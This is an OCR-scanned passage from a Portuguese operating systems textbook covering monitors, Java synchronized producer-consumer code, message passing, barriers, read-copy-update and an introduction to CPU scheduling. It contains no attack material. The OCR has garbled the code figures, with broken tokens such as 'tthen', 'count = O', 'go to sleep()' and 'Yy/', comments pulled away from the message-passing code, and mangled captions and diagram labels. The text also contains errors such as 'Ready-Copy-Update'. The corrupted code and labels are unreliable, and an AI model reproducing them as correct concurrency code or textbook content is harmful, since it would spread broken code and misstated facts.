do o outro. Brinch Hansen propôs uma saída inteligente 
para o problema, exigindo que um processo realizando 
um signal deva sair do monitor imediatamente. Em ou- 
tras palavras, um comando signal pode aparecer ape- 
nas como o comando final em uma rotina de monitor. 
Usaremos a proposta de Brinch Hansen, porque ela é 
conceitualmente mais simples e também mais fácil de 
implementar. Se um signal for realizado em uma variá- 
vel de condição em que vários processos estejam espe- 
rando, apenas um deles, determinado pelo escalonador 
do sistema, será revivido. 

Como nota, vale mencionar que há também uma ter- 
ceira solução, não proposta por Hoare, tampouco por 


Hansen, que é deixar o emissor do sinal continuar a 
executar e permitir que o processo em espera comece 
a ser executado apenas depois de o emissor do sinal ter 
deixado o monitor. 

Variáveis de condição não são contadores. Elas não 
acumulam sinais para uso posterior da maneira que 
os semáforos fazem. Desse modo, se uma variável de 
condição for sinalizada sem ninguém estar esperando 
pelo sinal, este será perdido para sempre. Em outras 
palavras, wait precisa vir antes de signal. Essa regra 
torna a implementação muito mais simples. Na prá- 
tica, não é um problema, pois é fácil controlar o es- 
tado de cada processo com variáveis, se necessário. 
Um processo que poderia de outra forma realizar um 
signal pode ver que essa operação não é necessária ao 
observar as variáveis. 

Um esqueleto do problema produtor-consumidor 
com monitores é dado na Figura 2.34 em uma lingua- 
gem imaginária, Pidgin Pascal. A vantagem de usar a 
Pidgin Pascal é que ela é pura e simples e segue exata- 
mente o modelo Hoare/Brinch Hansen. 

Talvez você esteja pensando que as operações wait e 
signal parecem similares a sleep e wakeup, que vimos 
antes e tinham condições de corrida fatais. Bem, elas 
são muito similares, mas com uma diferença crucial: 
sleep e wakeup fracassaram porque enquanto um pro- 
cesso estava tentando dormir, o outro tentava despertá- 
-lo. Com monitores, isso não pode acontecer. A exclusão 
mútua automática nas rotinas de monitor garante que 
se, digamos, o produtor dentro de uma rotina de moni- 
tor descobrir que o buffer está cheio, ele será capaz de 
completar a operação wait sem ter de se preocupar com 
a possibilidade de que o escalonador possa trocar para o 
consumidor um instante antes de wait ser concluída. O 
consumidor não será nem deixado entrar no monitor até 
que wait seja concluído e o produtor seja marcado como 
não mais executável. 

Embora Pidgin Pascal seja uma linguagem imaginá- 
ria, algumas linguagens de programação reais também 
dão suporte a monitores, embora nem sempre na for- 
ma projetada por Hoare e Brinch Hansen. Java é uma 
dessas linguagens. Java é uma linguagem orientada a 
objetos que dá suporte a threads de usuário e também 
permite que métodos (rotinas) sejam agrupados juntos 
em classes. Ao acrescentar a palavra-chave synchro- 
nized a uma declaração de método, Java garante que 
uma vez que qualquer thread tenha começado a execu- 
tar aquele método, não será permitido a nenhum outro 
thread executar qualquer outro método synchronized 
daquele objeto. Sem synchronized, não há garantias so- 
bre essa intercalação. 
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lc): PEZI Um esqueleto do problema produtor-consumidor 
com monitores. Somente uma rotina do monitor 
está ativa por vez. O buffer tem N vagas. 


monitor ProducerConsume 
condition full, empty; 
integer count, 


procedure insert(item: integer); 
begin 

if count= Nthen wait (full); 

insert item(item); 

count: = count + 1; 

if count = tthen signal (empty) 
end; 


functionremove:integer; 
begin 
if count = O then wait (empty); 
remove = remove. item; 
count: = count- 1; 
if count = N —1 then signal (full) 
end; 


count:= 0; 
end monitor; 


procedure producer, 
begin 
while true do 
begin 
item = produce. item; 
ProducerConsumer.insert(item) 
end 
end; 


procedure consumer, 
begin 
while true do 
begin 
item = ProducerConsumer.remove; 
consume _item/(item) 
end 
end; 


Uma solução para o problema produtor-consumidor 
usando monitores em Java é dada na Figura 2.35. Nossa 
solução tem quatro classes: a classe exterior, Producer- 
Consumer, cria e inicia dois threads, p e c; a segunda e a 
terceira classes, producer e consumer, respectivamente, 
contêm o que código para o produtor e o consumidor; 
e, por fim, a classe our monitor, que é o monitor, e ela 
contém dois threads sincronizados que são usados para 
realmente inserir itens no buffer compartilhado e remo- 
vê-los. Diferentemente dos exemplos anteriores, aqui 
temos o código completo de insert e remove. 
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[FIGURA 2-35] Uma solução para o problema produtor-consumidor em Java. 


public class ProducerConsumer { 
static final int N = 100 // constante contendo o tamanho do buffer 
static producer p = new producer(); //instancia de um novo thread produtor 
static consumer c = new consumer(); // instancia de um novo thread consumidor 
static our monitor mon = new our monitor(); // instancia de um novo monitor 


public static void main(String args[]) { 
p.start(); // inicia o thread produtor 
c.start( ); // inicia o thread consumidor 


} 


static class producer extends Thread { 
public void run() {// o metodo run contem o codigo do thread 
int item; 
while (true) { // laco do produtor 
item = produce item(); 
mon.insert(item); 
} 
} 
private int produce_item(){...} // realmente produz 


} 


static class consumer extends Thread { 
public void run() {metodo run contem o codigo do thread 
int item; 
while (true) { // laco do consumidor 
item = mon.remove(); 
consume item (item); 
} 
} 
private void consume _item(int item) { ... Yy/ realmente consome 
} 
static class our_monitor { // este e o monitor 
private int buffer[] = new int[N]; 
private int count = 0, lo = O, hi = 0; // contadores e indices 


public synchronized void insert(int val) { 
if (count == N) go to sleep(); // se o buffer estiver cheio, va dormir 
buffer [hi] = val; // insere um item no buffer 
hi = (hi + 1) % N; // lugar para colocar o proximo item 
count = count + 1; // mais um item no buffer agora 
if (count == 1) notify(); // se o consumidor estava dormindo, acorde-o 
} 
public synchronized int remove( ) { 
int val; 
if (count == 0) go_to_sleep(); // se o buffer estiver vazio, va dormir 
val = buffer [lo]; // busca um item no buffer 
lo = (lo+ 1) %N; // lugar de onde buscar o proximo item 
count = count — 1; //um item a menos no buffer 
if (count == N — 1) notify(); // se o produtor estava dormindo, acorde-o 
return val; 
} 
private void go_to_sleep() { try{wait();} catch(InterruptedException exc) {};} 
} 


Os threads do produtor e do consumidor são fun- 
cionalmente idênticos a seus correspondentes em to- 
dos os nossos exemplos anteriores. O produtor tem um 
laço infinito gerando dados e colocando-os no buffer 
comum. O consumidor tem um laço igualmente infi- 
nito tirando dados do buffer comum e fazendo algo 
divertido com ele. 

A parte interessante desse programa é a classe 
our monitor, que contém o buffer, as variáveis de 
administração e dois métodos sincronizados. Quando 
o produtor está ativo dentro de insert, ele sabe com 
certeza que o consumidor não pode estar ativo dentro 
de remove, tornando seguro atualizar as variáveis e o 
buffer sem medo das condições de corrida. A variá- 
vel count controla quantos itens estão no buffer. Ela 
pode assumir qualquer valor de 0 até e incluindo N 
— 1. A variável /o é o índice da vaga do buffer onde o 
próximo item deve ser buscado. Similarmente, hi é o 
índice da vaga do buffer onde o próximo item deve ser 
colocado. É permitido que lo = hi, o que significa que 
0 item ou N itens estão no buffer. O valor de count diz 
qual caso é válido. 

Métodos sincronizados em Java diferem dos moni- 
tores clássicos em um ponto essencial: Java não tem va- 
riáveis de condição inseridas. Em vez disso, ela oferece 
duas rotinas, wait e notify, que são o equivalente a sleep 
e wakeup, exceto que, ao serem usadas dentro de méto- 
dos sincronizados, elas não são sujeitas a condições de 
corrida. Na teoria, o método wait pode ser interrompi- 
do, que é o papel do código que o envolve. Java exige 
que o tratamento de exceções seja claro. Para nosso pro- 
pósito, apenas imagine que go to sleep seja a maneira 
para ir dormir. 

Ao tornar automática a exclusão mútua de regiões 
críticas, os monitores tornam a programação paralela 
muito menos propensa a erros do que o uso de semáfo- 
ros. Mesmo assim, eles também têm alguns problemas. 
Não é à toa que nossos dois exemplos de monitores 
estavam escritos em Pidgin Pascal em vez de C, como 
são os outros exemplos neste livro. Como já dissemos, 
monitores são um conceito de linguagem de progra- 
mação. O compilador deve reconhecê-los e arranjá-los 
para a exclusão mútua de alguma maneira ou outra. 
C, Pascal e a maioria das outras linguagens não têm 
monitores, de maneira que não é razoável esperar que 
seus compiladores imponham quaisquer regras de ex- 
clusão mútua. Na realidade, como o compilador pode- 
ria saber quais rotinas estavam nos monitores e quais 
não estavam? 
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Essas mesmas linguagens tampouco têm semáfo- 
ros, mas acrescentar semáforos é fácil: tudo o que você 
precisa fazer é acrescentar suas rotinas de código de 
montagem curtas à biblioteca para emitir as chamadas 
up e down. Os compiladores não precisam nem saber 
que elas existem. É claro que os sistemas operacionais 
precisam saber a respeito dos semáforos, mas pelo me- 
nos se você tem um sistema operacional baseado em 
semáforo, ainda pode escrever os programas de usu- 
ário para ele em C ou C++ (ou mesmo linguagem de 
montagem se você for masoquista o bastante). Com 
monitores, você precisa de uma linguagem que os te- 
nha incorporados. 

Outro problema com monitores, e também com se- 
máforos, é que eles foram projetados para solucionar 
o problema da exclusão mútua em uma ou mais CPUs, 
todas com acesso a uma memória comum. Podemos 
evitar as corridas ao colocar os semáforos na memó- 
ria compartilhada e protegê-los com instruções TSL ou 
XCHG. Quando movemos para um sistema distribui- 
do consistindo em múltiplas CPUs, cada uma com sua 
própria memória privada e conectada por uma rede de 
área local, essas primitivas tornam-se inaplicáveis. A 
conclusão é que os semáforos são de um nível baixo 
demais e os monitores não são utilizáveis, exceto em 
algumas poucas linguagens de programação. Além 
disso, nenhuma das primitivas permite a troca de in- 
formações entre máquinas. Algo mais é necessário. 


2.3.8 Troca de mensagens 


Esse algo mais é a troca de mensagens. Esse méto- 
do de comunicação entre processos usa duas primitivas, 
send e receive, que, como semáforos e diferentemen- 
te dos monitores, são chamadas de sistema em vez de 
construções de linguagem. Como tais, elas podem ser 
facilmente colocadas em rotinas de biblioteca, como 


send(destination, &message); 


receive(source, &message); 


A primeira chamada envia uma mensagem para de- 
terminado destino e a segunda recebe uma mensagem 
de uma dada fonte (ou de ANY — qualquer —, se o re- 
ceptor não se importar). Se nenhuma mensagem estiver 
disponível, o receptor pode bloquear até que uma che- 
gue. Alternativamente, ele pode retornar imediatamente 
com um código de erro. 
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Questões de projeto para sistemas de troca de 
mensagens 


Sistemas de troca de mensagens têm muitos problemas 
e questões de projeto que não surgem com semáforos ou 
com monitores, especialmente se os processos de comuni- 
cação são de máquinas diferentes conectadas por uma rede. 
Por exemplo, mensagens podem ser perdidas pela rede. 
Para proteger-se contra mensagens perdidas, o emissor e 
o receptor podem combinar que tão logo uma mensagem 
tenha sido recebida, o receptor enviará uma mensagem 
especial de confirmação de recebimento de volta. Se o 
emissor não tiver recebido a confirmação de recebimento 
em dado intervalo, ele retransmite a mensagem. 

Agora considere o que acontece se a mensagem é 
recebida corretamente, mas a confirmação de recebi- 
mento enviada de volta para o emissor for perdida. O 
emissor retransmitirá a mensagem, assim o receptor a 
receberá duas vezes. É essencial que o receptor seja 
capaz de distinguir uma nova mensagem da retrans- 
missão de uma antiga. Normalmente, esse problema é 
solucionado colocando os números em uma sequência 
consecutiva em cada mensagem original. Se o receptor 
receber uma mensagem trazendo o mesmo número de 
sequência que a anterior, ele saberá que a mensagem 
é uma cópia que pode ser ignorada. A comunicação 
bem-sucedida diante de trocas de mensagens não con- 
fiáveis é uma parte importante do estudo de redes de 
computadores. Para mais informações, ver Tanenbaum 
e Wetherall (2010). 

Sistemas de mensagens também têm de lidar com a 
questão de como processos são nomeados, de maneira 
que o processo especificado em uma chamada send ou 
receive não seja ambíguo. A autenticação também é 
uma questão nos sistemas de mensagens: como o clien- 
te pode saber se está se comunicando com o servidor de 
arquivos real, e não com um impostor? 

Na outra ponta do espectro, há também questões de 
projeto que são importantes quando o emissor e o recep- 
tor estão na mesma máquina. Uma delas é o desempenho. 
Copiar mensagens de um processo para o outro é sempre 
algo mais lento do que realizar uma operação de semáfo- 
ro ou entrar em um monitor. Muito trabalho foi dispendi- 
do em tornar eficiente a transmissão da mensagem. 


O problema produtor-consumidor com a troca de 
mensagens 


Agora vamos ver como o problema do produtor- 
-consumidor pode ser solucionado com a troca de 


mensagens e nenhuma memória compartilhada. Uma 
solução é dada na Figura 2.36. Supomos que todas as 
mensagens são do mesmo tamanho e que as enviadas, 
mas ainda não recebidas são colocadas no buffer auto- 
maticamente pelo sistema operacional. Nessa solução, 
um total de N mensagens é usado, de maneira análoga 
às N vagas em um buffer de memória compartilhada. O 
consumidor começa enviando N mensagens vazias para 
o produtor. Sempre que o produtor tem um item para dar 
ao consumidor, ele pega uma mensagem vazia e envia 
de volta uma cheia. Assim, o número total de mensa- 
gens no sistema segue constante pelo tempo, de maneira 
que elas podem ser armazenadas em um determinado 
montante de memória previamente conhecido. 

Se o produtor trabalhar mais rápido que o consumi- 
dor, todas as mensagens terminarão cheias, esperando 
pelo consumidor; o produtor será bloqueado, esperando 
por uma vazia voltar. Se o consumidor trabalhar mais 
rápido, então o inverso acontecerá: todas as mensagens 
estarão vazias esperando pelo produtor para enchê-las; 
o consumidor será bloqueado, esperando por uma men- 
sagem cheia. 

Muitas variações são possíveis com a troca de men- 
sagens. Para começo de conversa, vamos examinar 
como elas são endereçadas. Uma maneira é designar a 
cada processo um endereço único e fazer que as men- 
sagens sejam endereçadas aos processos. Uma manei- 
ra diferente é inventar uma nova estrutura de dados, 
chamada caixa postal. Uma caixa postal é um local 
para armazenar um dado número de mensagens, tipi- 
camente especificado quando a caixa postal é criada. 
Quando caixas postais são usadas, os parâmetros de 
endereço nas chamadas send e receive são caixas pos- 
tais, não processos. Quando um processo tenta enviar 
uma mensagem para uma caixa postal que está cheia, 
ele é suspenso até que uma mensagem seja removida 
daquela caixa postal, abrindo espaço para uma nova 
mensagem. 

Para o problema produtor-consumidor, tanto o pro- 
dutor quanto o consumidor criariam caixas postais 
grandes o suficiente para conter N mensagens. O pro- 
dutor enviaria mensagens contendo dados reais para a 
caixa postal do consumidor. Quando caixas postais são 
usadas, o mecanismo de buffer é claro: a caixa postal 
de destino armazena mensagens que foram enviadas 
para o processo de destino, mas que ainda não foram 
aceitas. 

O outro extremo de ter caixas postais é eliminar todo 
o armazenamento. Quando essa abordagem é escolhi- 
da, se o send for realizado antes do receive, o processo 
de envio é bloqueado até receive acontecer, momento 


[eU TI O problema produtor-consumidor com N mensagens. 
fdefine N 100 


void producer(void) 
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/* numero de lugares no buffer */ 


/* buffer de mensagens */ 


/* gera alguma coisa para colocar no buffer */ 
/* espera que uma mensagem vazia chegue */ 
/* monta uma mensagem para enviar */ 

/* envia item para consumidor */ 


for (i = 0; i < N; i++) send(producer, &m); /* envia N mensagens vazias */ 


{ 
int item; 
message m; 
while (TRUE) { 
item = produce item(); 
receive(consumer, &m); 
build message(&m, item); 
send(consumer, &m); 
} 
} 
void consumer(void) 
{ 
int item, i; 
message m; 
while (TRUE) { 
receive(producer, &m); 
item = extract_item(&m); 
send(producer, &m); 
consume _item(item); 
} 
} 


em que a mensagem pode ser copiada diretamente do 
emissor para 0 receptor, sem armazenamento. De modo 
similar, se o receive é realizado primeiro, o receptor é 
bloqueado até que um send aconteça. Essa estratégia 
é muitas vezes conhecida como rendezvous (encontro 
marcado). Ela é mais fácil de implementar do que um 
esquema de mensagem armazenada, mas é menos fle- 
xível, já que o emissor e o receptor são forçados a ser 
executados de maneira sincronizada. 

A troca de mensagens é comumente usada em sis- 
temas de programação paralela. Um sistema de troca 
de mensagens bem conhecido, por exemplo, é o MPI 
(message passing interface — interface de troca de 
mensagem). Ele é amplamente usado para a computa- 
ção científica. Para mais informações sobre ele, veja 
Gropp et al. (1994) e Snirt et al. (1996). 


2.3.9 Barreiras 


Nosso último mecanismo de sincronização é dirigi- 
do a grupos de processos em vez de situações que en- 
volvem dois processos do tipo produtor-consumidor. 


/* pega mensagem contendo item */ 

/* extrai o item da mensagem */ 

/* envia a mensagem vazia como resposta */ 
/* faz alguma coisa com o item */ 


Algumas aplicações são divididas em fases e têm como 
regra que nenhum processo deve prosseguir para a fase 
seguinte até que todos os processos estejam prontos 
para isso. Tal comportamento pode ser conseguido co- 
locando uma barreira no fim de cada fase. Quando um 
processo atinge a barreira, ele é bloqueado até que todos 
os processos tenham atingido a barreira. Isso permite 
que grupos de processos sincronizem. A operação de 
barreira está ilustrada na Figura 2.37. 

Na Figura 2.37(a) vemos quatro processos apro- 
ximando-se de uma barreira. O que isso significa é 
que eles estão apenas computando e não chegaram ao 
fim da fase atual ainda. Após um tempo, o primeiro 
processo termina toda a computação exigida dele du- 
rante a primeira fase, então, ele executa a primitiva 
barrier, geralmente chamando um procedimento de 
biblioteca. O processo é então suspenso. Um pouco 
mais tarde, um segundo e então um terceiro processo 
terminam a primeira fase e também executam a pri- 
mitiva barrier. Essa situação está ilustrada na Figura 
2.37(b). Por fim, quando o último processo, C, atin- 
ge a barreira, todos os processos são liberados, como 
mostrado na Figura 2.37(c). 
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aleli: T EEA Uso de uma barreira. (a) Processos aproximando-se 
de uma barreira. (b) Todos os processos, exceto 
um, bloqueados na barreira. (c) Quando o último 
processo chega à barreira, todos podem passar. 


o 


Processo” (BB)... 


(A) (A) 

OÈ JO 

© © 
Tempo ——> Tempo ——> 
(b) (c) 


Como exemplo de um problema exigindo barreiras, 
considere um problema típico de relaxação na física ou en- 
genharia. Há tipicamente uma matriz que contém alguns 
valores iniciais. Os valores podem representar temperatu- 
ras em vários pontos em uma lâmina de metal. A ideia pode 
ser calcular quanto tempo leva para o efeito de uma chama 
colocada em um canto propagar-se através da lâmina. 

Começando com os valores atuais, uma transforma- 
ção é aplicada à matriz para conseguir a segunda versão; 
por exemplo, aplicando as leis da termodinâmica para 
ver quais serão todas as temperaturas posteriormente a 
AT. Então o processo é repetido várias vezes, fornecen- 
do as temperaturas nos pontos de amostra como uma 
função do tempo à medida que a lâmina aquece. O al- 
goritmo produz uma sequência de matrizes ao longo do 
tempo, cada uma para um determinado ponto no tempo. 

Agora imagine que a matriz é muito grande (por 
exemplo, 1 milhão por 1 milhão), de maneira que pro- 
cessos paralelos sejam necessários (possivelmente em 
um multiprocessador) para acelerar o cálculo. Processos 
diferentes funcionam em partes diferentes da matriz, cal- 
culando os novos elementos de matriz a partir dos valores 
anteriores de acordo com as leis da física. No entanto, 
nenhum processo pode começar na iteração n + 1 até que 


a iteração n esteja completa, isto é, até que todos os pro- 
cessos tenham terminado seu trabalho atual. A maneira 
de se alcançar essa meta é programar cada processo para 
executar uma operação barrier após ele ter terminado sua 
parte da iteração atual. Quando todos tiverem terminado, 
a nova matriz (a entrada para a próxima iteração) será 
terminada, e todos os processos serão liberados simulta- 
neamente para começar a próxima iteração. 


2.3.10 Evitando travas: leitura-cópia-atualização 


As travas mais rápidas não são travas de manei- 
ra alguma. A questão é se podemos permitir acessos 
de leitura e escrita concorrentes a estruturas de dados 
compartilhados sem usar travas. Em geral, a resposta 
é claramente não. Imagine o processo A ordenando um 
conjunto de números, enquanto o processo B está calcu- 
lando a média. Como A desloca os valores para lá e para 
cá através do conjunto, B pode encontrar alguns valores 
várias vezes e outros jamais. O resultado poderia ser 
qualquer um, mas seria quase certamente errado. 

Em alguns casos, no entanto, podemos permitir que 
um escritor atualize uma estrutura de dados mesmo que 
outros processos ainda a estejam usando. O truque é asse- 
gurar que cada leitor leia a versão anterior dos dados, ou 
anova, mas não alguma combinação esquisita da anterior 
e da nova. Como ilustração, considere a árvore mostrada 
na Figura 2.38. Leitores percorrem a árvore da raiz até 
suas folhas. Na metade superior da figura, um novo nó X 
é acrescentado. Para fazê-lo, “deixamos” o nó configura- 
do antes de torná-lo visível na árvore: inicializamos todos 
os valores no nó X, incluindo seus ponteiros filhos. En- 
tão, com uma escrita atômica, tornamos X um filho de A. 
Nenhum leitor jamais lerá uma versão inconsistente. Na 
metade inferior da figura, subsequentemente removemos 
B e D. Primeiro, fazemos que o ponteiro filho esquerdo 
de A aponte para C. Todos os leitores que estavam em A 
continuarão com o nó C e nunca verão B ou D. Em outras 
palavras, eles verão apenas a nova versão. Da mesma ma- 
neira, todos os leitores atualmente em B ou D continua- 
rão seguindo os ponteiros estruturais de dados originais 
e verão a versão anterior. Tudo fica bem assim, e jamais 
precisamos travar qualquer coisa. A principal razão por 
que a remoção de B e D funciona sem travar a estrutura 
de dados é que RCU (Ready-Copy-Update — leitura- 
-cópia-atualização) desacopla as fases de remoção e re- 
cuperação da atualização. 

É claro que há um problema. Enquanto não tivermos 
certeza de não haver mais leitores de B ou D, não podemos 
realmente liberá-los. Mas quanto tempo devemos esperar? 
Um minuto? Dez? Temos de esperar até que o último leitor 
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[eU WET: Leitura-cópia-atualização: inserindo um nó na árvore e então removendo um galho — tudo sem travas. 


Adicionando um nó: 





(a) Árvore original. 


(b) Inicializar nó X e conectar (c) Quando X for completamente 


E a X. Quaisquer leitores em inicializado, conectar X a A. Os 


Ae E não são afetados. 


Removendo nós: 





(d) Desacoplar B de A. 
Observe que ainda pode 
haver leitores em B. Todos os 
leitores em B verão a velha 
versão da árvore, enquanto 
todos os leitores atualmente 
em A verão a nova versão. 


tenha deixado esses nós. RCU determina cuidadosamente 
o tempo máximo que um leitor pode armazenar uma re- 
ferência para a estrutura de dados. Após esse período, ele 
pode recuperar seguramente a memória. Especificamente, 
leitores acessam a estrutura de dados no que é conhecido 
como uma seção crítica do lado do leitor que pode con- 
ter qualquer código, desde que não bloqueie ou adormeça. 
Nesse caso, sabemos o tempo máximo que precisamos es- 
perar. Especificamente, definimos um período de graça 
como qualquer período no qual sabemos que cada thread 
está do lado de fora da seção de leitura crítica pelo menos 
uma vez. Tudo ficará bem se esperarmos por um período 
que seja pelo menos igual ao período de graça antes da 
recuperação. Como não é permitido ao código na seção 
crítica de leitura bloquear ou adormecer, um critério sim- 
ples é esperar até que todos os threads tenham realizado 
um chaveamento de contexto. 


2.4 Escalonamento 


Quando um computador é multiprogramado, ele fre- 
quentemente tem múltiplos processos ou threads compe- 
tindo pela CPU ao mesmo tempo. Essa situação ocorre 


(e) Espere até ter certeza de 
que todos os leitores 
deixaram Be C. Esses 

nós não podem mais ser 
acessados. 


leitores atualmente em E terão lido 
a versão anterior, enquanto leitores 
em A pegarão a nova versão da 
árvore. 





(f) Agora podemos remover 
seguramente Be D. 


sempre que dois ou mais deles estão simultaneamente no 
estado pronto. Se apenas uma CPU está disponível, uma 
escolha precisa ser feita sobre qual processo será execu- 
tado em seguida. A parte do sistema operacional que faz 
a escolha é chamada de escalonador, e o algoritmo que 
ele usa é chamado de algoritmo de escalonamento. Esses 
tópicos formam o assunto a ser tratado nas seções a seguir. 

Muitas das mesmas questões que se aplicam ao esca- 
lonamento de processos também se aplicam ao escalo- 
namento de threads, embora algumas sejam diferentes. 
Quando o núcleo gerencia threads, o escalonamento é 
geralmente feito por thread, com pouca ou nenhuma 
consideração sobre o processo ao qual o thread pertence. 
De início nos concentraremos nas questões de escalo- 
namento que se aplicam a ambos, processos e threads. 
Depois, examinaremos explicitamente o escalonamento 
de threads e algumas das questões exclusivas que ele 
gera. Abordaremos os chips multinúcleo no Capítulo 8. 


2.4.1 Introdução ao escalonamento 


Nos velhos tempos dos sistemas em lote com a 
entrada na forma de imagens de cartões em uma fita 
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magnética, o algoritmo de escalonamento era simples: 
apenas execute o próximo trabalho na fita. Com os siste- 
mas de multiprogramação, ele tornou-se mais complexo 
porque geralmente havia múltiplos usuários esperando 
pelo serviço. Alguns computadores de grande porte ain- 
da combinam serviço em lote e de compartilhamento 
de tempo, exigindo que o escalonador decida se um tra- 
balho em lote ou um usuário interativo em um terminal 
deve ir em seguida. (Como uma nota, um trabalho em 
lote pode ser uma solicitação para executar múltiplos 
programas em sucessão, mas para esta seção presumire- 
mos apenas que se trata de uma solicitação para execu- 
tar um único programa.) Como o tempo de CPU é um 
recurso escasso nessas máquinas, um bom escalonador 
pode fazer uma grande diferença no desempenho per- 
cebido e satisfação do usuário. Em consequência, uma 
grande quantidade de trabalho foi dedicada ao desen- 
volvimento de algoritmos de escalonamento inteligen- 
tes e eficientes. 

Com o advento dos computadores pessoais, a situação 
mudou de duas maneiras. Primeiro, na maior parte do 
tempo há apenas um processo ativo. É improvável que 
um usuário preparando um documento em um proces- 
sador de texto esteja simultaneamente compilando um 
programa em segundo plano. Quando o usuário digita 
um comando ao processador de texto, o escalonador não 
precisa fazer muito esforço para descobrir qual processo 
executar — o processador de texto é o único candidato. 

Segundo, computadores tornaram-se tão rápidos 
com o passar dos anos que a CPU dificilmente ainda é 
um recurso escasso. A maioria dos programas para com- 
putadores pessoais é limitada pela taxa na qual o usuá- 
rio pode apresentar a entrada (digitando ou clicando), 
não pela taxa na qual a CPU pode processá-la. Mesmo 
as compilações, um importante sorvedouro de ciclos de 
CPUs no passado, levam apenas alguns segundos hoje. 
Mesmo quando dois programas estão de fato sendo exe- 
cutados ao mesmo tempo, como um processador de tex- 
to e uma planilha, dificilmente importa qual deles vai 
primeiro, pois o usuário provavelmente está esperando 
que ambos terminem. Como consequência, o escalona- 
mento não importa muito em PCs simples. É claro que 
há aplicações que praticamente devoram a CPU viva. 
Por exemplo, reproduzir uma hora de vídeo de alta re- 
solução enquanto se ajustam as cores em cada um dos 
107.892 quadros (em NTSC) ou 90.000 quadros (em 
PAL) exige uma potência computacional de nível indus- 
trial. No entanto, aplicações similares são a exceção em 
vez de a regra. 

Quando voltamos aos servidores em rede, a situa- 
ção muda consideravelmente. Aqui múltiplos processos 


muitas vezes competem pela CPU, de maneira que o 
escalonamento importa outra vez. Por exemplo, quando 
a CPU tem de escolher entre executar um processo que 
reúne as estatísticas diárias e um que serve a solicita- 
ções de usuários, estes ficarão muito mais contentes se 
o segundo receber a primeira chance de acessar a CPU. 

O argumento da “abundância de recursos” também 
não se sustenta em muitos dispositivos móveis, como 
smartphones (exceto talvez os modelos mais potentes) e 
nós em redes de sensores. Além disso, já que a duração 
da bateria é uma das restrições mais importantes nesses 
dispositivos, alguns escalonadores tentam otimizar o 
consumo de energia. 

Além de escolher o processo certo a ser executa- 
do, o escalonador também tem de se preocupar em 
fazer um uso eficiente da CPU, pois o chaveamento 
de processos é algo caro. Para começo de conversa, 
uma troca do modo usuário para o modo núcleo preci- 
sa ocorrer. Então o estado do processo atual precisa ser 
salvo, incluindo armazenar os seus registros na tabela 
de processos para que eles possam ser recarregados 
mais tarde. Em alguns sistemas, o mapa de memória 
(por exemplo, os bits de referência à memória na ta- 
bela de páginas) precisa ser salvo da mesma maneira. 
Em seguida, um novo processo precisa ser selecionado 
executando o algoritmo de escalonamento. Após isso, 
a MMU (memory management unit — unidade de ge- 
renciamento de memória) precisa ser recarregada com 
o mapa de memória do novo processo. Por fim, o novo 
processo precisa ser inicializado. Além de tudo isso, a 
troca de processo pode invalidar o cache de memória 
e as tabelas relacionadas, forçando-o a ser dinamica- 
mente recarregado da memória principal duas vezes 
(ao entrar no núcleo e ao deixá-lo). De modo geral, 
realizar muitas trocas de processos por segundo pode 
consumir um montante substancial do tempo da CPU, 
então, recomenda-se cautela. 


Comportamento de processos 


Quase todos os processos alternam surtos de com- 
putação com solicitações de E/S (disco ou rede), como 
mostrado na Figura 2.39. Muitas vezes, a CPU executa 
por um tempo sem parar, então uma chamada de siste- 
ma é feita para ler de um arquivo ou escrever para um 
arquivo. Quando a chamada de sistema é concluída, a 
CPU calcula novamente até que ela precisa de mais da- 
dos ou tem de escrever mais dados, e assim por diante. 
Observe que algumas atividades de E/S contam como 
computação. Por exemplo, quando a CPU copia bits 
para uma RAM de vídeo para atualizar a tela, ela está 
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eT PÆL] Surtos de uso da CPU alternam-se com períodos de espera por E/S. (a) Um processo limitado pela CPU. (b) Um processo 


limitado pela E/S. 
(a) 


A 


Surto longo de uso de CPU 





Espera pela E/S 


Surto curto de uso de CPU 


/ 


(b) 


Tempo 


computando, não realizando E/S, pois a CPU está em 
uso. E/S nesse sentido é quando um processo entra no 
estado bloqueado esperando por um dispositivo externo 
para concluir o seu trabalho. 

A questão importante a ser observada a respeito da 
Figura 2.39 é que alguns processos, como o mostrado na 
Figura 2.39(a), passam a maior do tempo computando, 
enquanto outros, como o mostrado na Figura 2.39(b), 
passam a maior parte do tempo esperando pela E/S. Os 
primeiros são chamados limitados pela computação 
ou limitados pela CPU; os segundos são chamados 
limitados pela E/S. Processos limitados pela CPU ge- 
ralmente têm longos surtos de CPU e então esporádicas 
esperas de E/S, enquanto os processos limitados pela 
E/S têm surtos de CPU curtos e esperas de E/S frequen- 
tes. Observe que o fator chave é o comprimento do surto 
da CPU, não o comprimento do surto da E/S. Processos 
limitados pela E/S são limitados pela E/S porque eles 
não computam muito entre solicitações de E/S, não por 
terem tais solicitações especialmente demoradas. Eles 
levam o mesmo tempo para emitir o pedido de hardwa- 
re para ler um bloco de disco, independentemente de 
quanto tempo levam para processar os dados após eles 
chegarem. 

Vale a pena observar que, à medida que as CPUs 
ficam mais rápidas, os processos tendem a ficar mais 
limitados pela E/S. Esse efeito ocorre porque as CPUs 
estão melhorando muito mais rápido que os discos. 
Em consequência, é provável que o escalonamento de 
processos limitados pela E/S torne-se um assunto mais 
importante no futuro. A ideia básica aqui é que se um 
processo limitado pela E/S quiser executar, ele deve 
receber uma chance rapidamente para que possa emi- 
tir sua solicitação de disco e manter o disco ocupado. 
Como vimos na Figura 2.6, quando os processos são 
limitados pela E/S, são necessários diversos deles para 
manter a CPU completamente ocupada. 





Quando escalonar 


Uma questão fundamental relacionada com o esca- 
lonamento é quando tomar decisões de escalonamen- 
to. Na realidade, há uma série de situações nas quais 
o escalonamento é necessário. Primeiro, quando um 
novo processo é criado, uma decisão precisa ser toma- 
da a respeito de qual processo, o pai ou o filho, deve 
ser executado. Tendo em vista que ambos os processos 
estão em um estado pronto, trata-se de uma decisão de 
escalonamento normal e pode ser qualquer uma, isto é, 
o escalonador pode legitimamente escolher executar o 
processo pai ou o filho em seguida. 

Segundo, uma decisão de escalonamento precisa ser 
tomada ao término de um processo. Esse processo não 
pode mais executar (já que ele não existe mais), então 
algum outro precisa ser escolhido do conjunto de pro- 
cessos prontos. Se nenhum está pronto, um processo 
ocioso gerado pelo sistema normalmente é executado. 

Terceiro, quando um processo bloqueia para E/S, 
em um semáforo, ou por alguma outra razão, outro pro- 
cesso precisa ser selecionado para executar. Às vezes, a 
razão para bloquear pode ter um papel na escolha. Por 
exemplo, se 4 é um processo importante e ele está espe- 
rando por B para sair de sua região crítica, deixar que B 
execute em seguida permitirá que ele saia de sua região 
crítica e desse modo deixe que 4 continue. O problema, 
no entanto, é que o escalonador geralmente não tem a 
